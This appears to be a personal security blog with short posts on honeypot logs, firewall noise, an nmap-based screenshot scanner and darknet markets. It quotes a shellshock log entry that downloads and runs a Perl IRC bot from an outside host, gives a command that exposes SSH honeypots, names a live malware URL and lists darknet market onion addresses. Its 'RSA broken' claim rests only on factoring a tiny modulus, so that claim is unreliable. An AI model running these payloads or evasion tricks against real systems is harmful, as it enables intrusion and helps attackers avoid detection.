Chinese hackers

May 4th, 2017

Recently on a firewall log: 1 million deny entries PER DAY from china ..

Every day .. ~ 1 million deny entries with source in China.

Can’t we just ban them from the internet?

 

Honeypot detection

April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..

RSA broken?

February 25th, 2016

Via twitter i was directed to

https://www.linkedin.com/pulse/rsa-beginning-end-william-buchanan

(Thanks @Andrea for retweeting)

and saw a really fascinating approach to break RSA by pre-calculated prime factors.

Here is an online RSA-cracker:

http://asecuritysite.com/encryption/crackrsa?n=89%2C070%2C570%2C720%2C149%2C060%2C561%2C995%2C361%2C437%2C269%2C869%2C694%2C609%2C685%2C454%2C824%2C674%2C559

 

(cracking N=8907057072014906056199536143726986969460968545482 )

Wondering what will come next..

 

remote website screenshots

January 12th, 2016

Recently I wanted to check, if and what kind of webpages are available in a specific ip-address range. So I decided to scan the ips and make screenshots of the found services. Not as professional as archive.org or similar .. just a short look to get an idea. Problem was, that there was no tool which I just could fire up. So I started frickling some scripts ..

Step 1: scan the ip-range. I used nmap (what else) and logged the results in a file.

 nmap --open -p80,443 --host-timeout 3 --max-retries 2 172.16.0.0/16 > ll

That went quite fast.. Took only a few minutes. After that I started a small script for cleaning the result:

#!/bin/bash
grep -i "skipping" *ll > sl
awk '{ print $4}' < sl | sed s/\(// | sed s/\)// > sl2
grep "report for" *ll > l
awk '{ print $NF}' < l | sed s/\(// | sed s/\)// > l2
for i in ` cat sl2`
do
 grep -v $i l2 > xx
 mv xx l2
done
 
./l.sh
./i.sh

Okay .. here is the l.sh and i.sh:
l.sh: (start TOR first .. don’t want to annoy someone..)

for i in `cat l2`
do
torsocks wget –convert-links -B http://$i –no-check-certificate -t 1 -T 2 -O $i.html $i ; xvfb-run — wkhtmltopdf $i.html $i.pdf
torsocks wget –convert-links -B https://$i –no-check-certificate -t 1 -T 2 -O $i-443.html https://$i ; xvfb-run — wkhtmltopdf $i-443.html $i-443.pdf
done

Needed some tries with wget until I had an acceptable result. Played around with “-p” and “-r -l 1” and “-E” and  “-K” .. that one with just the -B worked best for me. So had the html-files.. but I wanted to have a quick look at them and did not want to start browsing local files. Therefore I transformed the html-files to pdf, and then (in the next step) I used convert to get png – files. (Did not find any html-to-png tools)

i.sh :

for i in `ls *pdf`
do
  convert $i `basename -s .pdf $i`.png 
done

(After that: copy the png-files to a place of your choice.., generate thumbnails..scroll around…)

There are some commcial vendors for services like this with much better quality (including zoomable thumbnails, galeries..you name it) but I wanted to have a quick’n dirty solution for free..

Though I am pretty sure that there are much better tools and hundred better solutions this worked for me.

~7000 ssh logins

January 5th, 2016

recently I looked in some honeypot results – ending in finding of the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are forced into a fake Adobe update).

Looking around further I found (besides some scanner-tools, code..) two files stage1 and stage2 under the subdir /r4 ,  containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots I will try to send out mails to the appropriate abuse-contacts; maybe some of them are for real.

recently in the webserver log ..

August 17th, 2015

While strolling through the webserver-logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

So you want to be a darknet drug lord ..

April 16th, 2015

..is the title of an article a user named “th3j35t3r” published on pastebin.

Here is the Link to the interesting article

Starwars in the office

January 5th, 2015

Now here is a funny movie what happens in an office when nerds get attacked..

https://t.co/JIBMlNs4ei

scanner at the airport

December 24th, 2014

A posting in german about my experiences with bodyscanners at the cologne airport can be found at

http://verzaell.uss.koeln/?p=67

 

Merry Christmas everyone!

…and there it is again :-)

November 9th, 2014

Did not take too long this time.. Silk Road 3.0 is on its way..

 

  1. — SilkRoad3.0 —
  2. http://reloadedudjtjvxr.onion
  3. —SilkRoad3.0 Forums —
  4. http://b6bubdh43n6l6p72.onion

 http://pastebin.com/rJTmzwvM